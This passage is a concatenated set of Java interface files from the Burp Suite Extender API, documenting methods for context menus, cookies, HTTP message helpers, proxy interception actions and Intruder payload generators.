4 | * @(#)IContextMenuInvocation.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.awt.event.InputEvent;
13 |
14 | /**
15 | * This interface is used when Burp calls into an extension-provided
16 | * IContextMenuFactory with details of a context menu invocation.
17 | * The custom context menu factory can query this interface to obtain details of
18 | * the invocation event, in order to determine what menu items should be
19 | * displayed.
20 | */
21 | public interface IContextMenuInvocation
22 | {
23 | /**
24 | * Used to indicate that the context menu is being invoked in a request
25 | * editor.
26 | */
27 | static final byte CONTEXT_MESSAGE_EDITOR_REQUEST = 0;
28 | /**
29 | * Used to indicate that the context menu is being invoked in a response
30 | * editor.
31 | */
32 | static final byte CONTEXT_MESSAGE_EDITOR_RESPONSE = 1;
33 | /**
34 | * Used to indicate that the context menu is being invoked in a non-editable
35 | * request viewer.
36 | */
37 | static final byte CONTEXT_MESSAGE_VIEWER_REQUEST = 2;
38 | /**
39 | * Used to indicate that the context menu is being invoked in a non-editable
40 | * response viewer.
41 | */
42 | static final byte CONTEXT_MESSAGE_VIEWER_RESPONSE = 3;
43 | /**
44 | * Used to indicate that the context menu is being invoked in the Target
45 | * site map tree.
46 | */
47 | static final byte CONTEXT_TARGET_SITE_MAP_TREE = 4;
48 | /**
49 | * Used to indicate that the context menu is being invoked in the Target
50 | * site map table.
51 | */
52 | static final byte CONTEXT_TARGET_SITE_MAP_TABLE = 5;
53 | /**
54 | * Used to indicate that the context menu is being invoked in the Proxy
55 | * history.
56 | */
57 | static final byte CONTEXT_PROXY_HISTORY = 6;
58 | /**
59 | * Used to indicate that the context menu is being invoked in the Scanner
60 | * results.
61 | */
62 | static final byte CONTEXT_SCANNER_RESULTS = 7;
63 | /**
64 | * Used to indicate that the context menu is being invoked in the Intruder
65 | * payload positions editor.
66 | */
67 | static final byte CONTEXT_INTRUDER_PAYLOAD_POSITIONS = 8;
68 | /**
69 | * Used to indicate that the context menu is being invoked in an Intruder
70 | * attack results.
71 | */
72 | static final byte CONTEXT_INTRUDER_ATTACK_RESULTS = 9;
73 | /**
74 | * Used to indicate that the context menu is being invoked in a search
75 | * results window.
76 | */
77 | static final byte CONTEXT_SEARCH_RESULTS = 10;
78 |
79 | /**
80 | * This method can be used to retrieve the native Java input event that was
81 | * the trigger for the context menu invocation.
82 | *
83 | * @return The InputEvent that was the trigger for the context
84 | * menu invocation.
85 | */
86 | InputEvent getInputEvent();
87 |
88 | /**
89 | * This method can be used to retrieve the Burp tool within which the
90 | * context menu was invoked.
91 | *
92 | * @return A flag indicating the Burp tool within which the context menu was
93 | * invoked. Burp tool flags are defined in the
94 | * IBurpExtenderCallbacks interface.
95 | */
96 | int getToolFlag();
97 |
98 | /**
99 | * This method can be used to retrieve the context within which the menu was
100 | * invoked.
101 | *
102 | * @return An index indicating the context within which the menu was
103 | * invoked. The indices used are defined within this interface.
104 | */
105 | byte getInvocationContext();
106 |
107 | /**
108 | * This method can be used to retrieve the bounds of the user's selection
109 | * into the current message, if applicable.
110 | *
111 | * @return An int[2] array containing the start and end offsets of the
112 | * user's selection in the current message. If the user has not made any
113 | * selection in the current message, both offsets indicate the position of
114 | * the caret within the editor. If the menu is not being invoked from a
115 | * message editor, the method returns null.
116 | */
117 | int[] getSelectionBounds();
118 |
119 | /**
120 | * This method can be used to retrieve details of the HTTP requests /
121 | * responses that were shown or selected by the user when the context menu
122 | * was invoked.
123 | *
124 | * Note: For performance reasons, the objects returned from this
125 | * method are tied to the originating context of the messages within the
126 | * Burp UI. For example, if a context menu is invoked on the Proxy intercept
127 | * panel, then the
128 | * IHttpRequestResponse returned by this method will reflect
129 | * the current contents of the interception panel, and this will change when
130 | * the current message has been forwarded or dropped. If your extension
131 | * needs to store details of the message for which the context menu has been
132 | * invoked, then you should query those details from the
133 | * IHttpRequestResponse at the time of invocation, or you
134 | * should use
135 | * IBurpExtenderCallbacks.saveBuffersToTempFiles() to create a
136 | * persistent read-only copy of the
137 | * IHttpRequestResponse.
138 | *
139 | * @return An array of IHttpRequestResponse objects
140 | * representing the items that were shown or selected by the user when the
141 | * context menu was invoked. This method returns null if no
142 | * messages are applicable to the invocation.
143 | */
144 | IHttpRequestResponse[] getSelectedMessages();
145 |
146 | /**
147 | * This method can be used to retrieve details of the Scanner issues that
148 | * were selected by the user when the context menu was invoked.
149 | *
150 | * @return An array of IScanIssue objects representing the
151 | * issues that were selected by the user when the context menu was invoked.
152 | * This method returns null if no Scanner issues are applicable
153 | * to the invocation.
154 | */
155 | IScanIssue[] getSelectedIssues();
156 | }
157 |
--------------------------------------------------------------------------------
/src/main/java/burp/ICookie.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)ICookie.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.Date;
13 |
14 | /**
15 | * This interface is used to hold details about an HTTP cookie.
16 | */
17 | public interface ICookie
18 | {
19 | /**
20 | * This method is used to retrieve the domain for which the cookie is in
21 | * scope.
22 | *
23 | * @return The domain for which the cookie is in scope. Note: For
24 | * cookies that have been analyzed from responses (by calling
25 | * IExtensionHelpers.analyzeResponse() and then
26 | * IResponseInfo.getCookies(), the domain will be
27 | * null if the response did not explicitly set a domain
28 | * attribute for the cookie.
29 | */
30 | String getDomain();
31 |
32 | /**
33 | * This method is used to retrieve the path for which the cookie is in
34 | * scope.
35 | *
36 | * @return The path for which the cookie is in scope or null if none is set.
37 | */
38 | String getPath();
39 |
40 | /**
41 | * This method is used to retrieve the expiration time for the cookie.
42 | *
43 | * @return The expiration time for the cookie, or
44 | * null if none is set (i.e., for non-persistent session
45 | * cookies).
46 | */
47 | Date getExpiration();
48 |
49 | /**
50 | * This method is used to retrieve the name of the cookie.
51 | *
52 | * @return The name of the cookie.
53 | */
54 | String getName();
55 |
56 | /**
57 | * This method is used to retrieve the value of the cookie.
58 | * @return The value of the cookie.
59 | */
60 | String getValue();
61 | }
62 |
--------------------------------------------------------------------------------
/src/main/java/burp/IExtensionHelpers.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IExtensionHelpers.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.net.URL;
13 | import java.util.List;
14 |
15 | /**
16 | * This interface contains a number of helper methods, which extensions can use
17 | * to assist with various common tasks that arise for Burp extensions.
18 | *
19 | * Extensions can call IBurpExtenderCallbacks.getHelpers to obtain
20 | * an instance of this interface.
21 | */
22 | public interface IExtensionHelpers
23 | {
24 |
25 | /**
26 | * This method can be used to analyze an HTTP request, and obtain various
27 | * key details about it.
28 | *
29 | * @param request An IHttpRequestResponse object containing the
30 | * request to be analyzed.
31 | * @return An IRequestInfo object that can be queried to obtain
32 | * details about the request.
33 | */
34 | IRequestInfo analyzeRequest(IHttpRequestResponse request);
35 |
36 | /**
37 | * This method can be used to analyze an HTTP request, and obtain various
38 | * key details about it.
39 | *
40 | * @param httpService The HTTP service associated with the request. This is
41 | * optional and may be null, in which case the resulting
42 | * IRequestInfo object will not include the full request URL.
43 | * @param request The request to be analyzed.
44 | * @return An IRequestInfo object that can be queried to obtain
45 | * details about the request.
46 | */
47 | IRequestInfo analyzeRequest(IHttpService httpService, byte[] request);
48 |
49 | /**
50 | * This method can be used to analyze an HTTP request, and obtain various
51 | * key details about it. The resulting IRequestInfo object will
52 | * not include the full request URL. To obtain the full URL, use one of the
53 | * other overloaded analyzeRequest() methods.
54 | *
55 | * @param request The request to be analyzed.
56 | * @return An IRequestInfo object that can be queried to obtain
57 | * details about the request.
58 | */
59 | IRequestInfo analyzeRequest(byte[] request);
60 |
61 | /**
62 | * This method can be used to analyze an HTTP response, and obtain various
63 | * key details about it.
64 | *
65 | * @param response The response to be analyzed.
66 | * @return An IResponseInfo object that can be queried to
67 | * obtain details about the response.
68 | */
69 | IResponseInfo analyzeResponse(byte[] response);
70 |
71 | /**
72 | * This method can be used to retrieve details of a specified parameter
73 | * within an HTTP request. Note: Use analyzeRequest() to
74 | * obtain details of all parameters within the request.
75 | *
76 | * @param request The request to be inspected for the specified parameter.
77 | * @param parameterName The name of the parameter to retrieve.
78 | * @return An IParameter object that can be queried to obtain
79 | * details about the parameter, or null if the parameter was
80 | * not found.
81 | */
82 | IParameter getRequestParameter(byte[] request, String parameterName);
83 |
84 | /**
85 | * This method can be used to URL-decode the specified data.
86 | *
87 | * @param data The data to be decoded.
88 | * @return The decoded data.
89 | */
90 | String urlDecode(String data);
91 |
92 | /**
93 | * This method can be used to URL-encode the specified data. Any characters
94 | * that do not need to be encoded within HTTP requests are not encoded.
95 | *
96 | * @param data The data to be encoded.
97 | * @return The encoded data.
98 | */
99 | String urlEncode(String data);
100 |
101 | /**
102 | * This method can be used to URL-decode the specified data.
103 | *
104 | * @param data The data to be decoded.
105 | * @return The decoded data.
106 | */
107 | byte[] urlDecode(byte[] data);
108 |
109 | /**
110 | * This method can be used to URL-encode the specified data. Any characters
111 | * that do not need to be encoded within HTTP requests are not encoded.
112 | *
113 | * @param data The data to be encoded.
114 | * @return The encoded data.
115 | */
116 | byte[] urlEncode(byte[] data);
117 |
118 | /**
119 | * This method can be used to Base64-decode the specified data.
120 | *
121 | * @param data The data to be decoded.
122 | * @return The decoded data.
123 | */
124 | byte[] base64Decode(String data);
125 |
126 | /**
127 | * This method can be used to Base64-decode the specified data.
128 | *
129 | * @param data The data to be decoded.
130 | * @return The decoded data.
131 | */
132 | byte[] base64Decode(byte[] data);
133 |
134 | /**
135 | * This method can be used to Base64-encode the specified data.
136 | *
137 | * @param data The data to be encoded.
138 | * @return The encoded data.
139 | */
140 | String base64Encode(String data);
141 |
142 | /**
143 | * This method can be used to Base64-encode the specified data.
144 | *
145 | * @param data The data to be encoded.
146 | * @return The encoded data.
147 | */
148 | String base64Encode(byte[] data);
149 |
150 | /**
151 | * This method can be used to convert data from String form into an array of
152 | * bytes. The conversion does not reflect any particular character set, and
153 | * a character with the hex representation 0xWXYZ will always be converted
154 | * into a byte with the representation 0xYZ. It performs the opposite
155 | * conversion to the method bytesToString(), and byte-based
156 | * data that is converted to a String and back again using these two methods
157 | * is guaranteed to retain its integrity (which may not be the case with
158 | * conversions that reflect a given character set).
159 | *
160 | * @param data The data to be converted.
161 | * @return The converted data.
162 | */
163 | byte[] stringToBytes(String data);
164 |
165 | /**
166 | * This method can be used to convert data from an array of bytes into
167 | * String form. The conversion does not reflect any particular character
168 | * set, and a byte with the representation 0xYZ will always be converted
169 | * into a character with the hex representation 0x00YZ. It performs the
170 | * opposite conversion to the method stringToBytes(), and
171 | * byte-based data that is converted to a String and back again using these
172 | * two methods is guaranteed to retain its integrity (which may not be the
173 | * case with conversions that reflect a given character set).
174 | *
175 | * @param data The data to be converted.
176 | * @return The converted data.
177 | */
178 | String bytesToString(byte[] data);
179 |
180 | /**
181 | * This method searches a piece of data for the first occurrence of a
182 | * specified pattern. It works on byte-based data in a way that is similar
183 | * to the way the native Java method String.indexOf() works on
184 | * String-based data.
185 | *
186 | * @param data The data to be searched.
187 | * @param pattern The pattern to be searched for.
188 | * @param caseSensitive Flags whether or not the search is case-sensitive.
189 | * @param from The offset within data where the search should
190 | * begin.
191 | * @param to The offset within data where the search should
192 | * end.
193 | * @return The offset of the first occurrence of the pattern within the
194 | * specified bounds, or -1 if no match is found.
195 | */
196 | int indexOf(byte[] data,
197 | byte[] pattern,
198 | boolean caseSensitive,
199 | int from,
200 | int to);
201 |
202 | /**
203 | * This method builds an HTTP message containing the specified headers and
204 | * message body. If applicable, the Content-Length header will be added or
205 | * updated, based on the length of the body.
206 | *
207 | * @param headers A list of headers to include in the message.
208 | * @param body The body of the message, of null if the message
209 | * has an empty body.
210 | * @return The resulting full HTTP message.
211 | */
212 | byte[] buildHttpMessage(List headers, byte[] body);
213 |
214 | /**
215 | * This method creates a GET request to the specified URL. The headers used
216 | * in the request are determined by the Request headers settings as
217 | * configured in Burp Spider's options.
218 | *
219 | * @param url The URL to which the request should be made.
220 | * @return A request to the specified URL.
221 | */
222 | byte[] buildHttpRequest(URL url);
223 |
224 | /**
225 | * This method adds a new parameter to an HTTP request, and if appropriate
226 | * updates the Content-Length header.
227 | *
228 | * @param request The request to which the parameter should be added.
229 | * @param parameter An IParameter object containing details of
230 | * the parameter to be added. Supported parameter types are:
231 | * PARAM_URL, PARAM_BODY and
232 | * PARAM_COOKIE.
233 | * @return A new HTTP request with the new parameter added.
234 | */
235 | byte[] addParameter(byte[] request, IParameter parameter);
236 |
237 | /**
238 | * This method removes a parameter from an HTTP request, and if appropriate
239 | * updates the Content-Length header.
240 | *
241 | * @param request The request from which the parameter should be removed.
242 | * @param parameter An IParameter object containing details of
243 | * the parameter to be removed. Supported parameter types are:
244 | * PARAM_URL, PARAM_BODY and
245 | * PARAM_COOKIE.
246 | * @return A new HTTP request with the parameter removed.
247 | */
248 | byte[] removeParameter(byte[] request, IParameter parameter);
249 |
250 | /**
251 | * This method updates the value of a parameter within an HTTP request, and
252 | * if appropriate updates the Content-Length header. Note: This
253 | * method can only be used to update the value of an existing parameter of a
254 | * specified type. If you need to change the type of an existing parameter,
255 | * you should first call removeParameter() to remove the
256 | * parameter with the old type, and then call addParameter() to
257 | * add a parameter with the new type.
258 | *
259 | * @param request The request containing the parameter to be updated.
260 | * @param parameter An IParameter object containing details of
261 | * the parameter to be updated. Supported parameter types are:
262 | * PARAM_URL, PARAM_BODY and
263 | * PARAM_COOKIE.
264 | * @return A new HTTP request with the parameter updated.
265 | */
266 | byte[] updateParameter(byte[] request, IParameter parameter);
267 |
268 | /**
269 | * This method can be used to toggle a request's method between GET and
270 | * POST. Parameters are relocated between the URL query string and message
271 | * body as required, and the Content-Length header is created or removed as
272 | * applicable.
273 | *
274 | * @param request The HTTP request whose method should be toggled.
275 | * @return A new HTTP request using the toggled method.
276 | */
277 | byte[] toggleRequestMethod(byte[] request);
278 |
279 | /**
280 | * This method constructs an IHttpService object based on the
281 | * details provided.
282 | *
283 | * @param host The HTTP service host.
284 | * @param port The HTTP service port.
285 | * @param protocol The HTTP service protocol.
286 | * @return An IHttpService object based on the details
287 | * provided.
288 | */
289 | IHttpService buildHttpService(String host, int port, String protocol);
290 |
291 | /**
292 | * This method constructs an IHttpService object based on the
293 | * details provided.
294 | *
295 | * @param host The HTTP service host.
296 | * @param port The HTTP service port.
297 | * @param useHttps Flags whether the HTTP service protocol is HTTPS or HTTP.
298 | * @return An IHttpService object based on the details
299 | * provided.
300 | */
301 | IHttpService buildHttpService(String host, int port, boolean useHttps);
302 |
303 | /**
304 | * This method constructs an IParameter object based on the
305 | * details provided.
306 | *
307 | * @param name The parameter name.
308 | * @param value The parameter value.
309 | * @param type The parameter type, as defined in the IParameter
310 | * interface.
311 | * @return An IParameter object based on the details provided.
312 | */
313 | IParameter buildParameter(String name, String value, byte type);
314 |
315 | /**
316 | * This method constructs an IScannerInsertionPoint object
317 | * based on the details provided. It can be used to quickly create a simple
318 | * insertion point based on a fixed payload location within a base request.
319 | *
320 | * @param insertionPointName The name of the insertion point.
321 | * @param baseRequest The request from which to build scan requests.
322 | * @param from The offset of the start of the payload location.
323 | * @param to The offset of the end of the payload location.
324 | * @return An IScannerInsertionPoint object based on the
325 | * details provided.
326 | */
327 | IScannerInsertionPoint makeScannerInsertionPoint(
328 | String insertionPointName,
329 | byte[] baseRequest,
330 | int from,
331 | int to);
332 |
333 | /**
334 | * This method analyzes one or more responses to identify variations in a
335 | * number of attributes and returns an IResponseVariations
336 | * object that can be queried to obtain details of the variations.
337 | *
338 | * @param responses The responses to analyze.
339 | * @return An IResponseVariations object representing the
340 | * variations in the responses.
341 | */
342 | IResponseVariations analyzeResponseVariations(byte[]... responses);
343 |
344 | /**
345 | * This method analyzes one or more responses to identify the number of
346 | * occurrences of the specified keywords and returns an
347 | * IResponseKeywords object that can be queried to obtain
348 | * details of the number of occurrences of each keyword.
349 | *
350 | * @param keywords The keywords to look for.
351 | * @param responses The responses to analyze.
352 | * @return An IResponseKeywords object representing the counts
353 | * of the keywords appearing in the responses.
354 | */
355 | IResponseKeywords analyzeResponseKeywords(List keywords, byte[]... responses);
356 | }
357 |
--------------------------------------------------------------------------------
/src/main/java/burp/IExtensionStateListener.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IExtensionStateListener.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerExtensionStateListener() to
15 | * register an extension state listener. The listener will be notified of
16 | * changes to the extension's state. Note: Any extensions that start
17 | * background threads or open system resources (such as files or database
18 | * connections) should register a listener and terminate threads / close
19 | * resources when the extension is unloaded.
20 | */
21 | public interface IExtensionStateListener
22 | {
23 | /**
24 | * This method is called when the extension is unloaded.
25 | */
26 | void extensionUnloaded();
27 | }
28 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpListener.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IHttpListener.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerHttpListener() to register an
15 | * HTTP listener. The listener will be notified of requests and responses made
16 | * by any Burp tool. Extensions can perform custom analysis or modification of
17 | * these messages by registering an HTTP listener.
18 | */
19 | public interface IHttpListener
20 | {
21 | /**
22 | * This method is invoked when an HTTP request is about to be issued, and
23 | * when an HTTP response has been received.
24 | *
25 | * @param toolFlag A flag indicating the Burp tool that issued the request.
26 | * Burp tool flags are defined in the
27 | * IBurpExtenderCallbacks interface.
28 | * @param messageIsRequest Flags whether the method is being invoked for a
29 | * request or response.
30 | * @param messageInfo Details of the request / response to be processed.
31 | * Extensions can call the setter methods on this object to update the
32 | * current message and so modify Burp's behavior.
33 | */
34 | void processHttpMessage(int toolFlag,
35 | boolean messageIsRequest,
36 | IHttpRequestResponse messageInfo);
37 | }
38 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpRequestResponse.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IHttpRequestResponse.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used to retrieve and update details about HTTP messages.
14 | *
15 | * Note: The setter methods generally can only be used before the message
16 | * has been processed, and not in read-only contexts. The getter methods
17 | * relating to response details can only be used after the request has been
18 | * issued.
19 | */
20 | public interface IHttpRequestResponse
21 | {
22 | /**
23 | * This method is used to retrieve the request message.
24 | *
25 | * @return The request message.
26 | */
27 | byte[] getRequest();
28 |
29 | /**
30 | * This method is used to update the request message.
31 | *
32 | * @param message The new request message.
33 | */
34 | void setRequest(byte[] message);
35 |
36 | /**
37 | * This method is used to retrieve the response message.
38 | *
39 | * @return The response message.
40 | */
41 | byte[] getResponse();
42 |
43 | /**
44 | * This method is used to update the response message.
45 | *
46 | * @param message The new response message.
47 | */
48 | void setResponse(byte[] message);
49 |
50 | /**
51 | * This method is used to retrieve the user-annotated comment for this item,
52 | * if applicable.
53 | *
54 | * @return The user-annotated comment for this item, or null if none is set.
55 | */
56 | String getComment();
57 |
58 | /**
59 | * This method is used to update the user-annotated comment for this item.
60 | *
61 | * @param comment The comment to be assigned to this item.
62 | */
63 | void setComment(String comment);
64 |
65 | /**
66 | * This method is used to retrieve the user-annotated highlight for this
67 | * item, if applicable.
68 | *
69 | * @return The user-annotated highlight for this item, or null if none is
70 | * set.
71 | */
72 | String getHighlight();
73 |
74 | /**
75 | * This method is used to update the user-annotated highlight for this item.
76 | *
77 | * @param color The highlight color to be assigned to this item. Accepted
78 | * values are: red, orange, yellow, green, cyan, blue, pink, magenta, gray,
79 | * or a null String to clear any existing highlight.
80 | */
81 | void setHighlight(String color);
82 |
83 | /**
84 | * This method is used to retrieve the HTTP service for this request /
85 | * response.
86 | *
87 | * @return An
88 | * IHttpService object containing details of the HTTP service.
89 | */
90 | IHttpService getHttpService();
91 |
92 | /**
93 | * This method is used to update the HTTP service for this request /
94 | * response.
95 | *
96 | * @param httpService An
97 | * IHttpService object containing details of the new HTTP
98 | * service.
99 | */
100 | void setHttpService(IHttpService httpService);
101 |
102 | }
103 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpRequestResponsePersisted.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IHttpRequestResponsePersisted.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used for an
14 | * IHttpRequestResponse object whose request and response messages
15 | * have been saved to temporary files using
16 | * IBurpExtenderCallbacks.saveBuffersToTempFiles().
17 | */
18 | public interface IHttpRequestResponsePersisted extends IHttpRequestResponse
19 | {
20 | /**
21 | * This method is deprecated and no longer performs any action.
22 | */
23 | @Deprecated
24 | void deleteTempFiles();
25 | }
26 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpRequestResponseWithMarkers.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IHttpRequestResponseWithMarkers.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.List;
13 |
14 | /**
15 | * This interface is used for an
16 | * IHttpRequestResponse object that has had markers applied.
17 | * Extensions can create instances of this interface using
18 | * IBurpExtenderCallbacks.applyMarkers(), or provide their own
19 | * implementation. Markers are used in various situations, such as specifying
20 | * Intruder payload positions, Scanner insertion points, and highlights in
21 | * Scanner issues.
22 | */
23 | public interface IHttpRequestResponseWithMarkers extends IHttpRequestResponse
24 | {
25 | /**
26 | * This method returns the details of the request markers.
27 | *
28 | * @return A list of index pairs representing the offsets of markers for the
29 | * request message. Each item in the list is an int[2] array containing the
30 | * start and end offsets for the marker. The method may return
31 | * null if no request markers are defined.
32 | */
33 | List getRequestMarkers();
34 |
35 | /**
36 | * This method returns the details of the response markers.
37 | *
38 | * @return A list of index pairs representing the offsets of markers for the
39 | * response message. Each item in the list is an int[2] array containing the
40 | * start and end offsets for the marker. The method may return
41 | * null if no response markers are defined.
42 | */
43 | List getResponseMarkers();
44 | }
45 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpService.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IHttpService.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used to provide details about an HTTP service, to which
14 | * HTTP requests can be sent.
15 | */
16 | public interface IHttpService
17 | {
18 | /**
19 | * This method returns the hostname or IP address for the service.
20 | *
21 | * @return The hostname or IP address for the service.
22 | */
23 | String getHost();
24 |
25 | /**
26 | * This method returns the port number for the service.
27 | *
28 | * @return The port number for the service.
29 | */
30 | int getPort();
31 |
32 | /**
33 | * This method returns the protocol for the service.
34 | *
35 | * @return The protocol for the service. Expected values are "http" or
36 | * "https".
37 | */
38 | String getProtocol();
39 | }
40 |
--------------------------------------------------------------------------------
/src/main/java/burp/IInterceptedProxyMessage.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IInterceptedProxyMessage.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.net.InetAddress;
13 |
14 | /**
15 | * This interface is used to represent an HTTP message that has been intercepted
16 | * by Burp Proxy. Extensions can register an
17 | * IProxyListener to receive details of proxy messages using this
18 | * interface. *
19 | */
20 | public interface IInterceptedProxyMessage
21 | {
22 | /**
23 | * This action causes Burp Proxy to follow the current interception rules to
24 | * determine the appropriate action to take for the message.
25 | */
26 | static final int ACTION_FOLLOW_RULES = 0;
27 | /**
28 | * This action causes Burp Proxy to present the message to the user for
29 | * manual review or modification.
30 | */
31 | static final int ACTION_DO_INTERCEPT = 1;
32 | /**
33 | * This action causes Burp Proxy to forward the message to the remote server
34 | * or client, without presenting it to the user.
35 | */
36 | static final int ACTION_DONT_INTERCEPT = 2;
37 | /**
38 | * This action causes Burp Proxy to drop the message.
39 | */
40 | static final int ACTION_DROP = 3;
41 | /**
42 | * This action causes Burp Proxy to follow the current interception rules to
43 | * determine the appropriate action to take for the message, and then make a
44 | * second call to processProxyMessage.
45 | */
46 | static final int ACTION_FOLLOW_RULES_AND_REHOOK = 0x10;
47 | /**
48 | * This action causes Burp Proxy to present the message to the user for
49 | * manual review or modification, and then make a second call to
50 | * processProxyMessage.
51 | */
52 | static final int ACTION_DO_INTERCEPT_AND_REHOOK = 0x11;
53 | /**
54 | * This action causes Burp Proxy to skip user interception, and then make a
55 | * second call to processProxyMessage.
56 | */
57 | static final int ACTION_DONT_INTERCEPT_AND_REHOOK = 0x12;
58 |
59 | /**
60 | * This method retrieves a unique reference number for this
61 | * request/response.
62 | *
63 | * @return An identifier that is unique to a single request/response pair.
64 | * Extensions can use this to correlate details of requests and responses
65 | * and perform processing on the response message accordingly.
66 | */
67 | int getMessageReference();
68 |
69 | /**
70 | * This method retrieves details of the intercepted message.
71 | *
72 | * @return An IHttpRequestResponse object containing details of
73 | * the intercepted message.
74 | */
75 | IHttpRequestResponse getMessageInfo();
76 |
77 | /**
78 | * This method retrieves the currently defined interception action. The
79 | * default action is
80 | * ACTION_FOLLOW_RULES. If multiple proxy listeners are
81 | * registered, then other listeners may already have modified the
82 | * interception action before it reaches the current listener. This method
83 | * can be used to determine whether this has occurred.
84 | *
85 | * @return The currently defined interception action. Possible values are
86 | * defined within this interface.
87 | */
88 | int getInterceptAction();
89 |
90 | /**
91 | * This method is used to update the interception action.
92 | *
93 | * @param interceptAction The new interception action. Possible values are
94 | * defined within this interface.
95 | */
96 | void setInterceptAction(int interceptAction);
97 |
98 | /**
99 | * This method retrieves the name of the Burp Proxy listener that is
100 | * processing the intercepted message.
101 | *
102 | * @return The name of the Burp Proxy listener that is processing the
103 | * intercepted message. The format is the same as that shown in the Proxy
104 | * Listeners UI - for example, "127.0.0.1:8080".
105 | */
106 | String getListenerInterface();
107 |
108 | /**
109 | * This method retrieves the client IP address from which the request for
110 | * the intercepted message was received.
111 | *
112 | * @return The client IP address from which the request for the intercepted
113 | * message was received.
114 | */
115 | InetAddress getClientIpAddress();
116 | }
117 |
--------------------------------------------------------------------------------
/src/main/java/burp/IIntruderAttack.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IIntruderAttack.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used to hold details about an Intruder attack.
14 | */
15 | public interface IIntruderAttack
16 | {
17 | /**
18 | * This method is used to retrieve the HTTP service for the attack.
19 | *
20 | * @return The HTTP service for the attack.
21 | */
22 | IHttpService getHttpService();
23 |
24 | /**
25 | * This method is used to retrieve the request template for the attack.
26 | *
27 | * @return The request template for the attack.
28 | */
29 | byte[] getRequestTemplate();
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/src/main/java/burp/IIntruderPayloadGenerator.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IIntruderPayloadGenerator.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used for custom Intruder payload generators. Extensions
14 | * that have registered an
15 | * IIntruderPayloadGeneratorFactory must return a new instance of
16 | * this interface when required as part of a new Intruder attack.
17 | */
18 | public interface IIntruderPayloadGenerator
19 | {
20 | /**
21 | * This method is used by Burp to determine whether the payload generator is
22 | * able to provide any further payloads.
23 | *
24 | * @return Extensions should return
25 | * false when all the available payloads have been used up,
26 | * otherwise
27 | * true.
28 | */
29 | boolean hasMorePayloads();
30 |
31 | /**
32 | * This method is used by Burp to obtain the value of the next payload.
33 | *
34 | * @param baseValue The base value of the current payload position. This
35 | * value may be
36 | * null if the concept of a base value is not applicable (e.g.
37 | * in a battering ram attack).
38 | * @return The next payload to use in the attack.
39 | */
40 | byte[] getNextPayload(byte[] baseValue);
41 |
42 | /**
43 | * This method is used by Burp to reset the state of the payload generator
44 | * so that the next call to
